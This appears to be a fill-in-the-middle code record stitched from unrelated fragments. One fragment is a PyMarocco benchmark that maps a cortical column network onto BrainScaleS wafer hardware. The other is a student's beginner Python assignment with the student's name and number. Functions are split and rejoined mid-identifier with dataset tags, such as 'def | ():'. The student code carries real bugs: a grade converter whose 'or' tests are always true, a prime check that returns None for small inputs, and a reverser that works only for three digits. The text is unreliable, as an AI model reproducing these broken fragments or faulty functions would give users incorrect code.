parser.add_argument('--name', type=str,
default='cortical_column_network') # name
parser.add_argument('--placer', type=str, default='byNeuron')
parser.add_argument('--seed', default=0, type=int)
args = parser.parse_args()
# k_scale is set to "scale" by deflaut
if not args.k_scale:
args.k_scale = args.scale
taskname = "scale{}_k-scale{}_nsize{}_wafer{}_ignoreBlacklsiting{}".format(
args.scale,
args.k_scale,
args.n_size,
args.wafer,
args.ignore_blacklisting)
marocco = PyMarocco()
marocco.neuron_placement.default_neuron_size(args.n_size)
if(args.ignore_blacklisting):
marocco.defects.backend = Defects.Backend.Without
else:
marocco.defects.backend = Defects.Backend.XML
marocco.skip_mapping = False
marocco.backend = PyMarocco.Without
marocco.continue_despite_synapse_loss = True
marocco.default_wafer = C.Wafer(args.wafer) # give wafer args
marocco.calib_backend = PyMarocco.CalibBackend.Default
marocco.calib_path = "/wang/data/calibration/brainscales/default"
if args.defects_path:
marocco.defects.path = args.defects_path
else:
marocco.defects.path = "/wang/data/commissioning/BSS-1/rackplace/" + str(
args.wafer) + "/derived_plus_calib_blacklisting/current"
# c 4189 no specification
#taskname += "_c4189_"
# strategy
marocco.merger_routing.strategy( # is now default
marocco.merger_routing.minimize_as_possible)
#taskname += "_minimAsPoss"
'''
# placement strategy
user_strat = placer()
taskname += "_placer"
'''
if args.placer == "byNeuron":
user_strat = placer_neuron_cluster() # cluster by neurons
taskname += "_byNeuron"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "byEnum":
user_strat = placer_enum_IDasc() # cluster by neurons
taskname += "_byEnum"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "constrained":
# needed for 5720 with patch set 36(best results) or ps 50
from pymarocco_runtime import ConstrainedNeuronClusterer as placer_neuron_resizer
user_strat = placer_neuron_resizer()
taskname += "_constrained"
marocco.neuron_placement.default_placement_strategy(user_strat)
# give marocco the format of the results file
taskname += str(datetime.now())
marocco.persist = "results_{}_{}.xml.gz".format(
args.name, taskname)
start = datetime.now()
r = CorticalNetwork(marocco, scale=args.scale, k_scale=args.k_scale, seed = args.seed)
r.build()
mid = datetime.now()
try:
r.run()
totsynapses = marocco.stats.getSynapses()
totneurons = marocco.stats.getNumNeurons()
lostsynapses = marocco.stats.getSynapseLoss()
lostsynapsesl1 = marocco.stats.getSynapseLossAfterL1Routing()
perPopulation = r.getLoss(marocco)
print("Losses: ", lostsynapses, " of ", totsynapses, " L1Loss:",
lostsynapsesl1, " Relative:", lostsynapses / float(totsynapses))
except RuntimeError as err:
# couldn't place all populations
totsynapses = 1
totneurons = 1
lostsynapses = 1
lostsynapsesl1 = 1
logger.error(err)
end = datetime.now()
print("time:", end - start)
result = {
"model": args.name,
"task": taskname,
"scale": args.scale,
"k_scale": args.k_scale,
"n_size": args.n_size,
"wafer": args.wafer,
"ignore_blacklisting": args.ignore_blacklisting,
"timestamp": datetime.now().isoformat(),
"placer": args.placer,
"perPopulation": perPopulation,
"results": [
{"type": "performance",
"name": "setup_time",
"value": (end - mid).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "total_time",
"value": (end - start).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "synapses",
"value": totsynapses
},
{"type": "performance",
"name": "neurons",
"value": totneurons
},
{"type": "performance",
"name": "synapse_loss",
"value": lostsynapses
},
{"type": "performance",
"name": "synapse_loss_after_l1",
"value": lostsynapsesl1
}
]
}
with open("{}_{}_results.json".format(result["model"], result["task"]),
'w') as outfile:
json.dump(result, outfile)
if __name__ == '__main__':
r = main() | for layer, amount in par.K_ext.items():
# rate is given in model with 8Hz
# will not work for large networks, for now it is not used due to par.external_source
rate_to_ex = par.bg_rate * amount["E"] * self.k_scale
rate_to_in = par.bg_rate * amount["I"] * self.k_scale | random_line_split |
run.py | #!/usr/bin/env python
import argparse
from datetime import datetime
import json
import numpy as np
import pyhmf as pynn
import pyhalco_hicann_v2 as C
from pymarocco import PyMarocco
from pymarocco import Defects
from pysthal.command_line_util import init_logger
init_logger("ERROR", [])
import params as par
import pylogging
logger = pylogging.get("column-benchmark")
# At the moment only the deflaut placement strategy is tested. Can be added later to test different strategy
from pymarocco_runtime import ClusterByPopulationConnectivity as placer_pop
from pymarocco_runtime import ClusterByNeuronConnectivity as placer_neuron_cluster
from pymarocco_runtime import byNeuronBlockEnumAndPopulationIDasc as placer_enum_IDasc
class CorticalNetwork(object):
def __init__(self, marocco, scale, k_scale, seed):
# total connection counter
self.totalConnections = 0
self.marocco = marocco
# scale compared to original in amount of neurons network which has about 80,000 neurons
self.scale = scale
# scale connections, scales number of connections
self.k_scale = k_scale
# Name Tag
self.model = pynn.IF_cond_exp
self.seed = seed
pynn.setup(marocco=self.marocco)
def get_indegrees(self):
'''Get number of incoming synapses per neuron (used for in-degree scaling)'''
K = np.zeros([len(par.label),len(par.label)])
num_neurons = self.get_neuron_number()
for target_index, target_pop in enumerate(par.label):
for source_index, source_pop in enumerate(par.label):
n_target = num_neurons[target_index]
n_source = num_neurons[source_index]
K[target_index][source_index] = np.log(1. -
par.conn_probs[target_index][source_index]) / np.log(
1. - 1. / (n_target * n_source))/n_target
return K
def get_neuron_number(self):
'''stores the neuron numbers in list ordered such as label'''
num_neurons = []
layers = ['L23','L4','L5','L6']
keys = ['E', 'I']
for layer in layers:
for key in keys:
num_neurons.append(par.num_neurons[layer][key])
return num_neurons
def build(self):
# set populations
self.populations = {}
# calculate indegrees from connection probability
self.indegrees = self.get_indegrees()
for layer, exIn in par.num_neurons.items():
# [:1] to remove the first "L"
self.populations[layer[1:] + "e"] = pynn.Population(
int(exIn["E"] * self.scale), self.model)
self.populations[layer[1:] + "i"] = pynn.Population(
int(exIn["I"] * self.scale), self.model)
# Create projections
self.projections = []
self.projectionLabels = []
for targetIndex, targetPop in enumerate(par.label):
for sourceIndex, sourcePop in enumerate(par.label):
if sourcePop.endswith("e"):
target = "excitatory"
else:
target = "inhibitory"
sourceSize = self.populations[sourcePop].size
targetSize = self.populations[targetPop].size
# In-degree scaling as described in Albada et al. (2015) "Scalability of Asynchronous Networks
# Is Limited by One-to-One Mapping between Effective Connectivity and Correlations"
# Number of inputs per target neuron (in-degree) for full scale model is scaled with k_scale
# To receive total connection number it is multiplied with downscaled target population size (scale)
# Connection probability is not preserved if scale == k_scale (multiple connections neglected)
n_connection = int(round(self.indegrees[targetIndex][sourceIndex] * self.k_scale * targetSize))
self.totalConnections += n_connection
if(n_connection == 0):
continue
# connection matrix [(neuron_pop1,neuron_pop2,weight,delay),(...)]
matrix = np.zeros((4, n_connection),dtype= float)
np.random.seed(self.seed)
matrix[0] = np.random.randint(0, sourceSize, n_connection)
matrix[1] = np.random.randint(0, targetSize, n_connection)
# The delay and weight is not important for mapping
# PyNN requires it to be set to some value
matrix[2] = np.repeat(1, n_connection) # arbitrary weight
matrix[3] = np.repeat(0, n_connection) # arbitrary delay
matrix = matrix.T
matrix = [[int(a),int(b),c,d] for a,b,c,d in matrix]
connector = pynn.FromListConnector(matrix)
self.projections.append(pynn.Projection(
self.populations[sourcePop], self.populations[targetPop], connector, target=target, label=sourcePop + "-" + targetPop))
self.projectionLabels.append(sourcePop + "-" + targetPop)
print("total connections:", self.totalConnections)
# external input:
self.externalInputPops = {}
# External spikes or external current
external_source = par.external_source
# will not work for large networks, for now it is not used due to par.external_source
if (external_source == "spikeInput"):
print("using external input connections")
for layer, amount in par.K_ext.items():
# rate is given in model with 8Hz
# will not work for large networks, for now it is not used due to par.external_source
rate_to_ex = par.bg_rate * amount["E"] * self.k_scale
rate_to_in = par.bg_rate * amount["I"] * self.k_scale
self.externalInputPops[layer[1:] + "e"] = pynn.Population(
self.populations[layer[1:] + "e"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_ex})
self.externalInputPops[layer[1:] + "i"] = pynn.Population(
self.populations[layer[1:] + "i"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_in})
# create connections
for sourceKey, sourcePop in self.externalInputPops.items():
# set connector for each pop size since RandomDistribution object not supported by pyhmf
# arbitrary weight
externalConnector = pynn.OneToOneConnector(
weights = 1)
# create connection
self.projections.append(pynn.Projection(
sourcePop, self.populations[sourceKey], externalConnector, target="excitatory"))
self.projectionLabels.append("ext.-" + targetPop)
def getLoss(self, marocco):
perPopulation = {}
for i in range(len(self.projections)):
synLoss, totalSyn = self.projectionwise_synapse_loss(
self.projections[i], marocco)
perPopulation[self.projectionLabels[i]] = {
"synLoss": synLoss, "TotalSyns": totalSyn}
return perPopulation
def run(self):
pynn.run(1)
pynn.end()
def projectionwise_synapse_loss(self, proj, marocco):
"""
computes the synapse loss of a projection
params:
proj - a pyhmf.Projection
marocco - the PyMarocco object after the mapping has run.
returns: (nr of lost synapses, total synapses in projection)
"""
orig_weights = proj.getWeights(format='array')
mapped_weights = marocco.stats.getWeights(proj)
syns = np.where(~np.isnan(orig_weights))
realized_syns = np.where(~np.isnan(mapped_weights))
orig = len(syns[0])
realized = len(realized_syns[0])
if orig > 0:
print ("Projection-Wise Synapse Loss", proj, (orig - realized) * 100. / orig)
return orig - realized, orig
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def | ():
parser = argparse.ArgumentParser()
# scale factor of the whole network compared to the original one
parser.add_argument('--scale', default=0.01, type=float)
# size of one neueron in hw neurons
parser.add_argument('--n_size', default=4, type=int)
parser.add_argument('--k_scale', type=float) # scale of connections
# wafer defects that should be considered in the mapping
parser.add_argument('--wafer', '-w', type=int, default=24)
# specific path where the defect parts of the wafer are saved
# if nothing specified, current defects of the given wafer are used
parser.add_argument('--defects_path', type=str)
parser.add_argument('--ignore_blacklisting', type=str2bool, nargs='?',
default = False, const=True)
parser.add_argument('--name', type=str,
default='cortical_column_network') # name
parser.add_argument('--placer', type=str, default='byNeuron')
parser.add_argument('--seed', default=0, type=int)
args = parser.parse_args()
# k_scale is set to "scale" by deflaut
if not args.k_scale:
args.k_scale = args.scale
taskname = "scale{}_k-scale{}_nsize{}_wafer{}_ignoreBlacklsiting{}".format(
args.scale,
args.k_scale,
args.n_size,
args.wafer,
args.ignore_blacklisting)
marocco = PyMarocco()
marocco.neuron_placement.default_neuron_size(args.n_size)
if(args.ignore_blacklisting):
marocco.defects.backend = Defects.Backend.Without
else:
marocco.defects.backend = Defects.Backend.XML
marocco.skip_mapping = False
marocco.backend = PyMarocco.Without
marocco.continue_despite_synapse_loss = True
marocco.default_wafer = C.Wafer(args.wafer) # give wafer args
marocco.calib_backend = PyMarocco.CalibBackend.Default
marocco.calib_path = "/wang/data/calibration/brainscales/default"
if args.defects_path:
marocco.defects.path = args.defects_path
else:
marocco.defects.path = "/wang/data/commissioning/BSS-1/rackplace/" + str(
args.wafer) + "/derived_plus_calib_blacklisting/current"
# c 4189 no specification
#taskname += "_c4189_"
# strategy
marocco.merger_routing.strategy( # is now default
marocco.merger_routing.minimize_as_possible)
#taskname += "_minimAsPoss"
'''
# placement strategy
user_strat = placer()
taskname += "_placer"
'''
if args.placer == "byNeuron":
user_strat = placer_neuron_cluster() # cluster by neurons
taskname += "_byNeuron"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "byEnum":
user_strat = placer_enum_IDasc() # cluster by neurons
taskname += "_byEnum"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "constrained":
# needed for 5720 with patch set 36(best results) or ps 50
from pymarocco_runtime import ConstrainedNeuronClusterer as placer_neuron_resizer
user_strat = placer_neuron_resizer()
taskname += "_constrained"
marocco.neuron_placement.default_placement_strategy(user_strat)
# give marocco the format of the results file
taskname += str(datetime.now())
marocco.persist = "results_{}_{}.xml.gz".format(
args.name, taskname)
start = datetime.now()
r = CorticalNetwork(marocco, scale=args.scale, k_scale=args.k_scale, seed = args.seed)
r.build()
mid = datetime.now()
try:
r.run()
totsynapses = marocco.stats.getSynapses()
totneurons = marocco.stats.getNumNeurons()
lostsynapses = marocco.stats.getSynapseLoss()
lostsynapsesl1 = marocco.stats.getSynapseLossAfterL1Routing()
perPopulation = r.getLoss(marocco)
print("Losses: ", lostsynapses, " of ", totsynapses, " L1Loss:",
lostsynapsesl1, " Relative:", lostsynapses / float(totsynapses))
except RuntimeError as err:
# couldn't place all populations
totsynapses = 1
totneurons = 1
lostsynapses = 1
lostsynapsesl1 = 1
logger.error(err)
end = datetime.now()
print("time:", end - start)
result = {
"model": args.name,
"task": taskname,
"scale": args.scale,
"k_scale": args.k_scale,
"n_size": args.n_size,
"wafer": args.wafer,
"ignore_blacklisting": args.ignore_blacklisting,
"timestamp": datetime.now().isoformat(),
"placer": args.placer,
"perPopulation": perPopulation,
"results": [
{"type": "performance",
"name": "setup_time",
"value": (end - mid).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "total_time",
"value": (end - start).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "synapses",
"value": totsynapses
},
{"type": "performance",
"name": "neurons",
"value": totneurons
},
{"type": "performance",
"name": "synapse_loss",
"value": lostsynapses
},
{"type": "performance",
"name": "synapse_loss_after_l1",
"value": lostsynapsesl1
}
]
}
with open("{}_{}_results.json".format(result["model"], result["task"]),
'w') as outfile:
json.dump(result, outfile)
if __name__ == '__main__':
r = main()
| main | identifier_name |
a1_300068688.py.py | #Family name: Jared Amos
# Student number: 300068688
# Course: IT1 1120G
# Assignment Number 1
########################
# Question 1
########################
''' creates a function called repeat that takes 3 arguments, the fist argument is a string type and
and the second is a integer value 'n' and the third value is a string called 'delim' this function will
take the string add delim to the end of the string and repeat that 'n' amount times '''
def repeat(string, n, delim):
yoda = (string+delim)*n # creates a string 'yoda' and sets it equal to string+delim and repeats 'n' times
print(str(yoda)) #prints 'yoda'
########################
# Question 2
########################
''' creates a function called is_prime that takes one argument and check to see whether it is prime
or not, if it is a prime the function return true if not it returns else'''
def is_prime(n):
if n >= 2: # prime numbers are numbers that cant be divided unless its by 1 or it self so 'n' cannot be 1 or 2
for i in range(2, n): #creates a for loop that starts at 2 and ends at 'n'
if (n%i == 0): #checks to see whether n divides into i intergerally
return n<0 #if it does return false becuase n is not a prime number then
else:
return n>0 #returns true because n is a prime
########################
# Question 3
########################
''' Creates a function points that takes 4 arguments which make up to coordinates x1,y1 x2,y2
this function then computes the slope of the the line of these points and the distance between them
and outputs a message a message'''
def points(x1,y1,x2,y2):
distance = (((x2-x1)**2)+((y2-y1)**2))**(1/2) # finds the distance between these points by finding the hypotenuse of the triangle a^2 + b^2 = c^2
if (x2-x1)!= 0 and (y2-y1)!=0: #checks to see if the slope is not 0 and if it is print a special message
slope = (y2-y1)/(x2-x1) #computes slope
print("The slope is " + str(slope) + " and the distance is " + str(distance)) #prints out slope and distance
else:
print("the slope is infinity and the distance is " + str(distance))# slope is infinity so it outprints just the distance
########################
# Question 5
########################
''' creates a function reverse_int that takes one argument that is a integer and reverses
this integer'''
def reverse_int(num):
reverse1 = num%10 # gets you the number of the begining of the reversed integer
reverse2 = (num%100)-reverse1 # gets you the number of the second number in the reversed inetger
reverse1 = reverse1*100 # makes the number at the end now the begining
reverse3 = num//100 #gives you last number in the reversed integer
final = reverse1 + reverse2 + reverse3 # adds all the numbers together to get you the reversed int
return final #function returns the reversed int
########################
# Question 6
########################
''' creates a function vowelCount that takes one argument which is a string
and then prints out the number of vowels and what vowels are in the word'''
def vowelCount(string):
print('a, e, i, o, and u appear, respectively, ' + str(string.count('a'))+ ', ' + str(string.count('e'))+ ', ' + str(string.count('i')) + ', ' + str(string.count('o')) + ', ' + str(string.count('u'))+ ' times')
########################
# Question 7
########################
''' creayes a function with 3 input paramteres that are strings and checks to see if all the same
then returns true if they are and false if they are not'''
def allthesame(x,y,z):
if x==y and x==z and z==y: #if statment that checks whther they are all the sale
return x==y
else:
return 1<0
''' creates a function alldifferent that has 3 input paramteres that are all strings
and checks whether all the strings are different and returns true if they are and false
if they are not'''
def alldifferent(x,y,z):
if x != y and y != z and x != z: #checks to see whether the strings x, y and z are all different
return x!=y
else:
return 1<0
''' creates a function called sorted that takes 3 input paramteres and checks to see whether
they are in sorted order and returns true if they are and false if they are not'''
def sorted(x,y,z):
if z>y and z>x and y>x: #checks whther they are sorted
return z>y
else:
return 1<0
########################
# Question 8
########################
''' creates a function called leap that takes on input value that is an integer
, this function then computes whether that number was a leap year and
returns true if it was and false if it isnt'''
def leap(year):
if year%4==0 and year%100 != 0 or year%400==0: #checks whether the year was a leap year
return year>0
else:
return year<0
########################
# Question 9
########################
''' creates a function called letter2number tthat takes a string input that is a letter grade and converts them
to a number grade'''
def letter2number(letter):
if letter== 'A' or'A-' or 'A+': #checks to see if it was an A, A+ or A-
if letter == 'A': #assigns the corresponding number value to the letter and prints it
print(str(4))
elif letter == 'A+':
print(str(4+0.3))
elif letter== 'A-':
print(str(4-0.3))
if letter == 'B' or 'B-' or 'B+': #checks to see if it was an B, B+ or B-
if letter == 'B': #assigns the corresponding number value to the letter and prints it
print(str(3.0))
elif letter == 'B+':
print(str(3+0.3))
elif letter == 'B-':
print(str(3-0.3))
if letter == 'C' or 'C-' or 'C+': #checks to see if it was an C, C+ or C-
if letter== 'C': #assigns the corresponding number value to the letter and prints it
print(str(2.0))
elif letter== 'C+':
print(str(2+0.3))
elif letter== 'C-':
print(str(2-0.3))
if letter == 'D' or 'D-' or 'D+': #checks to see if it was an D, D+ or D-
if letter == 'D': #assigns the corresponding number value to the letter and prints it
print(str(1))
elif letter=='D+':
print(str(1+0.3))
elif letter=='D-':
print(str(1-0.3))
if letter == 'F':
print(str(0))
########################
# Question 10
########################
''' creates a function called is_Palindrome that takes one input that is a string
and determines if that string is the exact same when reversed and returns true if it is
and false if it is not '''
def is_Palindrome(string):
reverse = string[::-1] #reverses the string
if reverse == string:
|
else:
return reverse == string
########################
# Question 12
########################
''' creates a function called rps that is a game of rock, paper, scissors and takes two input paramteres that are strings
that are either 'S' 'P' 'R' and returns a -1 if player 1 wins and a 1 if player two wins and a zero if its a tie'''
def rps(player1, player2):
if player1 == 'R' and player2 == 'S' or player1 == 'P' and player2 == 'R' or player1 == 'S' and player2 == 'P':
return -1
elif player2 == 'R' and player1 == 'S' or player2 == 'P' and player1 == 'R' or player2 == 'S' and player1 == 'P':
return 1
else:
return 0
########################
# Question 14
########################
''' creates a function called count_even_digits that takes two arguments and returns the amount of even numbers in the first
paramater and the second paramtere is the amount of digits in the first one '''
def count_even_digits(int1, int2):
even = str(int1)
even = int(even.count('0')) + int(even.count('2')) + int(even.count('4')) + int(even.count('6')) + int(even.count('8')) #uses the count operator to see the amount of even numbers
print(str(even))
########################
# Question 13
########################
''' creates a function called alogical that takes one parameter n which must be a integer and counts how many times that integer must be
divided by 2 to be less than or equal to 1 '''
def alogical(n):
counter = 0
while n > 1 or n==1: # while loop is used to count the amount of times needed to divide by 2
n = n/2
counter = counter + 1
print(str(counter))
########################
# Question 11
########################
''' creates a function called is_nneg_float that takes one argument which is a integer and checks to see whether this integer
is a non negetive float and does this by checking if its more than a digit and has a decimal and returns true if it is a
non negative float and returns flalse if it is not '''
def is_nneg_float(s):
if s.count('.')==1 and s.count('e')==0 or len(s)>=1 and s.count('e')==0: #checks to see that it is a float or has atleast more than one digit
if float(s)>0:
return float(s)>0
else:
return float(s)>0
else:
return 0>1
########################
# Question 4
########################
''' creates a function called month_apart that takes 4 arguments and which are integers then checks to see whether these dates
are are atleast a month apart and returns true if they are and false if they are not '''
def month_apart(m1,d1,m2,d2):
if m1==m2: #cannot be a month apart apart if they share the same month
return m1 != m2
if abs(m1-m2)>1: # checks to see if the dates have diffrence of more than 1 month than they are for sure a month apart
return m1>0
if m1>m2: # checks to see whether they are a month apart with respect to the days of each date
return (d1-d2) >= 0
else:
return (d2-d1) >= 0
| return reverse == string | conditional_block |
a1_300068688.py.py | #Family name: Jared Amos
# Student number: 300068688
# Course: IT1 1120G
# Assignment Number 1
########################
# Question 1
########################
''' creates a function called repeat that takes 3 arguments, the fist argument is a string type and
and the second is a integer value 'n' and the third value is a string called 'delim' this function will
take the string add delim to the end of the string and repeat that 'n' amount times '''
def repeat(string, n, delim):
yoda = (string+delim)*n # creates a string 'yoda' and sets it equal to string+delim and repeats 'n' times
print(str(yoda)) #prints 'yoda'
########################
# Question 2
########################
''' creates a function called is_prime that takes one argument and check to see whether it is prime
or not, if it is a prime the function return true if not it returns else'''
def is_prime(n):
if n >= 2: # prime numbers are numbers that cant be divided unless its by 1 or it self so 'n' cannot be 1 or 2
for i in range(2, n): #creates a for loop that starts at 2 and ends at 'n'
if (n%i == 0): #checks to see whether n divides into i intergerally
return n<0 #if it does return false becuase n is not a prime number then
else:
return n>0 #returns true because n is a prime
########################
# Question 3
########################
''' Creates a function points that takes 4 arguments which make up to coordinates x1,y1 x2,y2
this function then computes the slope of the the line of these points and the distance between them
and outputs a message a message'''
def points(x1,y1,x2,y2):
distance = (((x2-x1)**2)+((y2-y1)**2))**(1/2) # finds the distance between these points by finding the hypotenuse of the triangle a^2 + b^2 = c^2
if (x2-x1)!= 0 and (y2-y1)!=0: #checks to see if the slope is not 0 and if it is print a special message
slope = (y2-y1)/(x2-x1) #computes slope
print("The slope is " + str(slope) + " and the distance is " + str(distance)) #prints out slope and distance
else:
print("the slope is infinity and the distance is " + str(distance))# slope is infinity so it outprints just the distance
########################
# Question 5
########################
''' creates a function reverse_int that takes one argument that is a integer and reverses
this integer'''
def reverse_int(num):
|
########################
# Question 6
########################
''' creates a function vowelCount that takes one argument which is a string
and then prints out the number of vowels and what vowels are in the word'''
def vowelCount(string):
print('a, e, i, o, and u appear, respectively, ' + str(string.count('a'))+ ', ' + str(string.count('e'))+ ', ' + str(string.count('i')) + ', ' + str(string.count('o')) + ', ' + str(string.count('u'))+ ' times')
########################
# Question 7
########################
''' creayes a function with 3 input paramteres that are strings and checks to see if all the same
then returns true if they are and false if they are not'''
def allthesame(x,y,z):
if x==y and x==z and z==y: #if statment that checks whther they are all the sale
return x==y
else:
return 1<0
''' creates a function alldifferent that has 3 input paramteres that are all strings
and checks whether all the strings are different and returns true if they are and false
if they are not'''
def alldifferent(x,y,z):
if x != y and y != z and x != z: #checks to see whether the strings x, y and z are all different
return x!=y
else:
return 1<0
''' creates a function called sorted that takes 3 input paramteres and checks to see whether
they are in sorted order and returns true if they are and false if they are not'''
def sorted(x,y,z):
if z>y and z>x and y>x: #checks whther they are sorted
return z>y
else:
return 1<0
########################
# Question 8
########################
''' creates a function called leap that takes on input value that is an integer
, this function then computes whether that number was a leap year and
returns true if it was and false if it isnt'''
def leap(year):
if year%4==0 and year%100 != 0 or year%400==0: #checks whether the year was a leap year
return year>0
else:
return year<0
########################
# Question 9
########################
''' creates a function called letter2number tthat takes a string input that is a letter grade and converts them
to a number grade'''
def letter2number(letter):
if letter== 'A' or'A-' or 'A+': #checks to see if it was an A, A+ or A-
if letter == 'A': #assigns the corresponding number value to the letter and prints it
print(str(4))
elif letter == 'A+':
print(str(4+0.3))
elif letter== 'A-':
print(str(4-0.3))
if letter == 'B' or 'B-' or 'B+': #checks to see if it was an B, B+ or B-
if letter == 'B': #assigns the corresponding number value to the letter and prints it
print(str(3.0))
elif letter == 'B+':
print(str(3+0.3))
elif letter == 'B-':
print(str(3-0.3))
if letter == 'C' or 'C-' or 'C+': #checks to see if it was an C, C+ or C-
if letter== 'C': #assigns the corresponding number value to the letter and prints it
print(str(2.0))
elif letter== 'C+':
print(str(2+0.3))
elif letter== 'C-':
print(str(2-0.3))
if letter == 'D' or 'D-' or 'D+': #checks to see if it was an D, D+ or D-
if letter == 'D': #assigns the corresponding number value to the letter and prints it
print(str(1))
elif letter=='D+':
print(str(1+0.3))
elif letter=='D-':
print(str(1-0.3))
if letter == 'F':
print(str(0))
########################
# Question 10
########################
''' creates a function called is_Palindrome that takes one input that is a string
and determines if that string is the exact same when reversed and returns true if it is
and false if it is not '''
def is_Palindrome(string):
reverse = string[::-1] #reverses the string
if reverse == string:
return reverse == string
else:
return reverse == string
########################
# Question 12
########################
''' creates a function called rps that is a game of rock, paper, scissors and takes two input paramteres that are strings
that are either 'S' 'P' 'R' and returns a -1 if player 1 wins and a 1 if player two wins and a zero if its a tie'''
def rps(player1, player2):
if player1 == 'R' and player2 == 'S' or player1 == 'P' and player2 == 'R' or player1 == 'S' and player2 == 'P':
return -1
elif player2 == 'R' and player1 == 'S' or player2 == 'P' and player1 == 'R' or player2 == 'S' and player1 == 'P':
return 1
else:
return 0
########################
# Question 14
########################
''' creates a function called count_even_digits that takes two arguments and returns the amount of even numbers in the first
paramater and the second paramtere is the amount of digits in the first one '''
def count_even_digits(int1, int2):
even = str(int1)
even = int(even.count('0')) + int(even.count('2')) + int(even.count('4')) + int(even.count('6')) + int(even.count('8')) #uses the count operator to see the amount of even numbers
print(str(even))
########################
# Question 13
########################
''' creates a function called alogical that takes one parameter n which must be a integer and counts how many times that integer must be
divided by 2 to be less than or equal to 1 '''
def alogical(n):
counter = 0
while n > 1 or n==1: # while loop is used to count the amount of times needed to divide by 2
n = n/2
counter = counter + 1
print(str(counter))
########################
# Question 11
########################
''' creates a function called is_nneg_float that takes one argument which is a integer and checks to see whether this integer
is a non negetive float and does this by checking if its more than a digit and has a decimal and returns true if it is a
non negative float and returns flalse if it is not '''
def is_nneg_float(s):
if s.count('.')==1 and s.count('e')==0 or len(s)>=1 and s.count('e')==0: #checks to see that it is a float or has atleast more than one digit
if float(s)>0:
return float(s)>0
else:
return float(s)>0
else:
return 0>1
########################
# Question 4
########################
''' creates a function called month_apart that takes 4 arguments and which are integers then checks to see whether these dates
are are atleast a month apart and returns true if they are and false if they are not '''
def month_apart(m1,d1,m2,d2):
if m1==m2: #cannot be a month apart apart if they share the same month
return m1 != m2
if abs(m1-m2)>1: # checks to see if the dates have diffrence of more than 1 month than they are for sure a month apart
return m1>0
if m1>m2: # checks to see whether they are a month apart with respect to the days of each date
return (d1-d2) >= 0
else:
return (d2-d1) >= 0
| reverse1 = num%10 # gets you the number of the begining of the reversed integer
reverse2 = (num%100)-reverse1 # gets you the number of the second number in the reversed inetger
reverse1 = reverse1*100 # makes the number at the end now the begining
reverse3 = num//100 #gives you last number in the reversed integer
final = reverse1 + reverse2 + reverse3 # adds all the numbers together to get you the reversed int
return final #function returns the reversed int
| identifier_body |
a1_300068688.py.py | #Family name: Jared Amos
# Student number: 300068688
# Course: IT1 1120G
# Assignment Number 1
########################
# Question 1
########################
''' creates a function called repeat that takes 3 arguments, the fist argument is a string type and
and the second is a integer value 'n' and the third value is a string called 'delim' this function will
take the string add delim to the end of the string and repeat that 'n' amount times '''
def repeat(string, n, delim):
yoda = (string+delim)*n # creates a string 'yoda' and sets it equal to string+delim and repeats 'n' times
print(str(yoda)) #prints 'yoda'
########################
# Question 2
########################
''' creates a function called is_prime that takes one argument and check to see whether it is prime
or not, if it is a prime the function return true if not it returns else'''
def is_prime(n):
if n >= 2: # prime numbers are numbers that cant be divided unless its by 1 or it self so 'n' cannot be 1 or 2
for i in range(2, n): #creates a for loop that starts at 2 and ends at 'n'
if (n%i == 0): #checks to see whether n divides into i intergerally
return n<0 #if it does return false becuase n is not a prime number then
else:
return n>0 #returns true because n is a prime
########################
# Question 3
########################
''' Creates a function points that takes 4 arguments which make up to coordinates x1,y1 x2,y2
this function then computes the slope of the the line of these points and the distance between them
and outputs a message a message'''
def points(x1,y1,x2,y2):
distance = (((x2-x1)**2)+((y2-y1)**2))**(1/2) # finds the distance between these points by finding the hypotenuse of the triangle a^2 + b^2 = c^2
if (x2-x1)!= 0 and (y2-y1)!=0: #checks to see if the slope is not 0 and if it is print a special message
slope = (y2-y1)/(x2-x1) #computes slope
print("The slope is " + str(slope) + " and the distance is " + str(distance)) #prints out slope and distance
else:
print("the slope is infinity and the distance is " + str(distance))# slope is infinity so it outprints just the distance
########################
# Question 5
########################
''' creates a function reverse_int that takes one argument that is a integer and reverses
this integer'''
def reverse_int(num):
reverse1 = num%10 # gets you the number of the begining of the reversed integer
reverse2 = (num%100)-reverse1 # gets you the number of the second number in the reversed inetger
reverse1 = reverse1*100 # makes the number at the end now the begining
reverse3 = num//100 #gives you last number in the reversed integer
final = reverse1 + reverse2 + reverse3 # adds all the numbers together to get you the reversed int
return final #function returns the reversed int
########################
# Question 6
########################
''' creates a function vowelCount that takes one argument which is a string
and then prints out the number of vowels and what vowels are in the word'''
def vowelCount(string):
print('a, e, i, o, and u appear, respectively, ' + str(string.count('a'))+ ', ' + str(string.count('e'))+ ', ' + str(string.count('i')) + ', ' + str(string.count('o')) + ', ' + str(string.count('u'))+ ' times')
########################
# Question 7
########################
''' creayes a function with 3 input paramteres that are strings and checks to see if all the same
then returns true if they are and false if they are not'''
def allthesame(x,y,z):
if x==y and x==z and z==y: #if statment that checks whther they are all the sale
return x==y
else:
return 1<0
''' creates a function alldifferent that has 3 input paramteres that are all strings
and checks whether all the strings are different and returns true if they are and false
if they are not'''
def alldifferent(x,y,z):
if x != y and y != z and x != z: #checks to see whether the strings x, y and z are all different
return x!=y
else:
return 1<0
''' creates a function called sorted that takes 3 input paramteres and checks to see whether
they are in sorted order and returns true if they are and false if they are not'''
def sorted(x,y,z):
if z>y and z>x and y>x: #checks whther they are sorted
return z>y
else:
return 1<0
########################
# Question 8
########################
''' creates a function called leap that takes on input value that is an integer
, this function then computes whether that number was a leap year and
returns true if it was and false if it isnt'''
def leap(year):
if year%4==0 and year%100 != 0 or year%400==0: #checks whether the year was a leap year
return year>0
else:
return year<0
########################
# Question 9
########################
''' creates a function called letter2number tthat takes a string input that is a letter grade and converts them
to a number grade'''
def | (letter):
